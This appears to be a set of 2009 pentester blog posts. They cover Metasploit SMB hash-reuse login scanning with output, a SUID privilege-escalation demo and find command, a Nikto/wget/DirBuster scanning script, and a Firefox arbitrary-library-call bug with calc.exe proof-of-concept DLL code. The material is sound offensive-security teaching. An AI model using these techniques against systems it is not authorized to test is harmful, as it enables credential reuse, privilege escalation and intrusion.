owning a windows network

so… you say you were able to grab LM / NTLM hashes from a windows box??? cool. now use them in the scanner/smb/login to check & see which systems use the same hashes:

msf exploit(psexec) > use scanner/smb/login
msf auxiliary(login) > info

Name: SMB Login Check Scanner
Version: 0
License: Metasploit Framework License (BSD)

Provided by:
tebo <tebo@attackresearch.com>

Basic options:
Name       Current Setting  Required  Description
—-       —————  ——–  ———–
RHOSTS                      yes       The target address range or CIDR identifier
RPORT      445              yes       Set the SMB service port
SMBDomain  WORKGROUP        no        SMB Domain
SMBPass                     no        SMB Password
SMBUser    Administrator    no        SMB Username
THREADS    1                yes       The number of concurrent threads

Description:
This module will test a SMB login on a range of machines and report
successful logins. If you have loaded a database plugin and
connected to a database this module will record successful logins
and hosts so you can track your access.

msf auxiliary(login) > set RHOSTS 10.1.1.0/24
RHOSTS => 10.1.1.0/24
msf auxiliary(login) > set SMBPass XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX (hash goes here)
SMBPass => XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
msf auxiliary(login) > exploit
[*] 10.1.1.6 – FAILED 0xc000006d – STATUS_LOGON_FAILURE
[*] 10.1.1.21 – SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2)
[*] Recording successful SMB credentials for 10.1.1.21
[*] 10.1.1.25 – SUCCESSFUL LOGIN (Windows 5.0)
[*] Recording successful SMB credentials for 10.1.1.25
[*] 10.1.1.29 – SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2)
[*] Recording successful SMB credentials for 10.1.1.29
[*] 10.1.1.28 – SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2)
[*] Recording successful SMB credentials for 10.1.1.28
[*] 10.1.1.31 – SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 1)

To speed it up, set THREADS > 1. Be careful not to set it too high:

[*] Error: 10.1.1.189: ActiveRecord::StatementInvalid SQLite3::BusyException: database is locked: INSERT INTO “hosts” (“address”, “name”, “comm”, “os_lang”, “mac”, “os_sp”, “arch”, “os_flavor”, “address6″, “os_name”, “desc”, “created”, “state”) VALUES(‘10.1.1.189′, NULL, ”, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, ‘2009-11-06 10:48:09′, ‘unknown’)

Thanks to tebo for the excellent work. Now, if only it worked with credcollect.

checking valid windows logins with metasploit

so you have some windows creds, and you want to check if they’re valid or not. turns out there’s a bunch of ways to do this:

1) auxiliary/scanner/smb/login
2) db_autopwn -m
3) msfcli scripting
4) sussuro’s method (python scripting through xmlrpc)

others?

exploiting suid binaries

just had a quick refresher on exploiting suid bits (and why they’re so darn evil):

jcran@aldatmak:/usr/bin$ ls -la id
-rwxr-xr-x 1 root root 35232 2008-06-26 20:31 id

jcran@aldatmak:/usr/bin$ id
uid=1000(jcran) gid=1000(jcran) groups=30(dip),127(vboxusers),1000(jcran)

jcran@aldatmak:/usr/bin$ sudo chmod u+s id

jcran@aldatmak:/usr/bin$ ls -la id
-rwxr-xr-x 1 root root 35232 2008-06-26 20:31 id

jcran@aldatmak:/usr/bin$ id
uid=1000(jcran) gid=1000(jcran) euid=0(root) groups=30(dip),127(vboxusers),1000(jcran)

jcran@aldatmak:/usr/bin$ sudo chmod u-s id

The first time it’s executed (no suid bit) – the euid is 1000, jcran. the second time, after the suid bit has been set, i’m effectively root.

finding all suid binaries on a system:

 find / -type f \( -perm -04000 -o -perm -02000 \) \-exec ls -lg {} \;

note, this technique doesn’t work on bash if it’s been set SUID.

exception has been thrown by the target of an invocation (bing + mono = fail)

if an app crashes on the internet, and no one is around to hear it....

security product recommendations in a pentest?

is there room for it?

after reading this post on the metasploit blog, i started thinking about how well I currently evaluate product implementations within a typical penetration test. If configuration auditing has been included, I’ll do some of this. However, as a pentester, it pays to know the products in use, and to be familiar with the differences between say, trend micro and kaspersky antivirus or Splunk and syslog. It would be useful to include specific measurements and recommendations around the products in use on the network.

for instance:

• Antivirus: Trend Micro – Configured properly, managed well. Recently garnered the top spot in an
• Spam filtering: Ironport – Not well configured. Recommend moving to the Sophos appliance for ease of use. (based on strengths of the team)
• Monitoring: Snort – Configured poorly. Recommend switching to bro to support policy / functionality separation. would streamline IT processes
• Vuln scanning: Nessus – AdHoc – Need to move to automated process, more advanced web-scanning tool. Look into qualys / ncircle / rapid7.
• Firewall: Cisco PIX
• Logging: Syslog server – …
• etc..
  

Now, the issue becomes two-fold. one, the tester needs to have a solid understanding of each of the products he’s evaluating / recommending and a clear understanding of the client’s needs. It’s not a typical penetration test function, but would definitely provide value to a customer. (The more i write here, the more it turns into a full configuration audit of the customer’s systems, and while would be a nice-to-have on a pentest, isn’t part of a typical assessment)

i think most shops steer clear of this under the ‘product agnostic’ label, but as long as that’s been made clear up front, i’d say go for it.

security tools with personality

i love tools with personality:

Caught exit of DirBuster
Writing report
Report saved to 192.168.254.8.dirbuster.html
Enjoy the rest of your day

The compilation process of nmap comes to mind:

awesome

as does KARMA:

Loading config file etc/karma-scan.xml
DNS-SERVER is running
DHCP-SERVER is running
Delivering judicious KARMA, hit Control-C to quit.

Others?

Automate basic web server checks

#!/bin/bash
#webservercheck.sh
for i in `cat $1`  ## for all lines in the file provided to the script
do
    echo “Nikto’ing $i”
    ##NOTE: Nikto needs to have been untarred here.
    /home/jcran/toolkit/nix/attack-net-webserver/nikto/nikto.pl -host $i -config /home/jcran/toolkit/nix/attack-net-webserver/nikto/config.txt | tee report.nikto.$i.txt

    ## Wget
    echo “wgett’ing HTTP://$i/”
    wget -r -l 2 http://$i/

    ## dirbuster
    java -jar /home/jcran/toolkit/nix/brute-web/DirBuster-0.12/DirBuster-0.12.jar -H -l /home/jcran/toolkit/wordlist/directory-list-2.3-tiny.txt -e asp,aspx,jsp -v -P -R -r $i.dirbuster.html -u http://$i
done

Call it as: ./webservercheck.sh <file with ips>

Ignore the awful pathing problems if you can. Anyhow, it does a nikto / wget / dirbuster for every host. handy if you’ve run a portscan on :80 (using something like nmap or propecia).

jcran

Google is the new AV.

Doing a little research on an exploit, i came across SecurityDot.Net. Google provided the link. However, when i clicked on it, i got this:

Of the 174 pages we tested on the site over the past 90 days, 4 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-09-11, and the last time suspicious content was found on this site was on 2009-09-11.Malicious software includes 2 trojan(s), 1 exploit(s). Successful infection resulted in an average of 3 new process(es) on the target machine.

Malicious software is hosted on 5 domain(s), including odile-marco.com/, google-analyze.org/, 213.163.89.0/.

This site was hosted on 1 network(s) including AS25220 (GLOBALNOC).

Also, when i tried to browse to the site directly, i got this:

Which turns out to be a built-in interface for the same google-stopbadware database.

Note that it was indeed a drive-by attack site. But is it’s google’s job to protect me when i click on a malicious link?

Call an arbitrary library with JavaScript? I think i will.

This is a handy way to execute code within the browser. Kudos to Jesse Ruderman and Dan Kaminsky for the bug discovery and POC.

Essentially, in Firefox up through 3.0.13 (my ubuntu 9.04 is running 3.0.11), there’s a publicly exposed javascript function which allows you to call an arbitrary crypto library on the system. Assuming you’re able to place a malicious library (see below) in the target environment, you could use this to get other systems to execute it. Extra win, you can use UNC paths to locate the library

Source is here. <– note, this is live, but it’s calling a non-existent crypto library.

The malicious library would need a function named CPkunkcsApp(), which, in this case, just calls ShellExecute.

<font face="monospace">CpkunkcsApp::CpkunkcsApp()
{
    char *str = "c:\\windows\\system32\\calc.exe";
    wchar_t *wText;
    size_t len;
    len = strlen(str)+1;
    wText = new wchar_t[strlen(str)];
    memset(wText, 0, len * sizeof(wchar_t));
    ::MultiByteToWideChar(CP_ACP, NULL, str, -1, wText, len);
    ShellExecute(NULL, NULL, wText, NULL, NULL, SW_SHOW);
}</font>

Scott Hanselman’s 2009 Utils List

I followed Scott Hanselman around for a year when I was touring with the Dead^W^W^W^W a build / team system admin. He always puts out a good utils list: http://www.hanselman.com/blog/ScottHanselmans2009UltimateDeveloperAndPowerUsersToolListForWindows.aspx

There are a few that are already in the pentesting toolkit:

•  Fiddler
•  PowerShell
•  .NET Reflector / NDepend
•  Notepad++
•  Firebug

And a few new ones

•  Storm
•  BugShooting (Works with trac?)
•  WinCheat
•  TextCrawler
•  PInvoke.NET
•  Microsoft Network Monitor 3.3

etc etc etc. lots of good stuff here. (i’m learning to blog when i’m procrastinating. back to work!)